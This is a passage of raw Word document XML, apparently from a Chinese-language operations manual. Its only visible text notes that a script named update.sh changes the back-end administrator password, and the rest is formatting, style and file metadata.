          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>update.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="PingFang TC" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>修改后台管理员账号密码</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C0776D" w:rsidRPr="00EF1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ExternalUIFontSimplifiedCh">
    <w:altName w:val="Microsoft YaHei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F50AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A112B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D16457"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="52C48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FB"/>
    <w:rsid w:val="000C39FB"/>
    <w:rsid w:val="001027CA"/>
    <w:rsid w:val="0012411F"/>
    <w:rsid w:val="00171E89"/>
    <w:rsid w:val="00196562"/>
    <w:rsid w:val="00202F2D"/>
    <w:rsid w:val="00210C8A"/>
    <w:rsid w:val="0021196D"/>
    <w:rsid w:val="00285DCF"/>
    <w:rsid w:val="0029218A"/>
    <w:rsid w:val="002A14A3"/>
    <w:rsid w:val="00372828"/>
    <w:rsid w:val="00414E95"/>
    <w:rsid w:val="004B5EEB"/>
    <w:rsid w:val="00545BE9"/>
    <w:rsid w:val="005671FD"/>
    <w:rsid w:val="005C2D1F"/>
    <w:rsid w:val="006E37BC"/>
    <w:rsid w:val="00803813"/>
    <w:rsid w:val="00850AE3"/>
    <w:rsid w:val="0087310E"/>
    <w:rsid w:val="00932E1F"/>
    <w:rsid w:val="00935E6D"/>
    <w:rsid w:val="00942029"/>
    <w:rsid w:val="00A0152D"/>
    <w:rsid w:val="00A44ECA"/>
    <w:rsid w:val="00A73B22"/>
    <w:rsid w:val="00A90EE6"/>
    <w:rsid w:val="00BF08CD"/>
    <w:rsid w:val="00C006F9"/>
    <w:rsid w:val="00C038B5"/>
    <w:rsid w:val="00C0776D"/>
    <w:rsid w:val="00C119B8"/>
    <w:rsid w:val="00C3019E"/>
    <w:rsid w:val="00CA1430"/>
    <w:rsid w:val="00D346EE"/>
    <w:rsid w:val="00D50ABB"/>
    <w:rsid w:val="00DE13D7"/>
    <w:rsid w:val="00E16578"/>
    <w:rsid w:val="00ED6518"/>
    <w:rsid w:val="00EF164C"/>
    <w:rsid w:val="00FC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ED44E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BDE4148D-4629-AB4A-A4E2-1D9195B87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9FB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9FB"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000C39FB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0C39FB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4E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22</Pages>
  <Words>3434</Words>
  <Characters>19578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office2016mac03776</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>office2016mac03776</cp:lastModifiedBy>
  <cp:revision>40</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-25T08:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-25T09:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>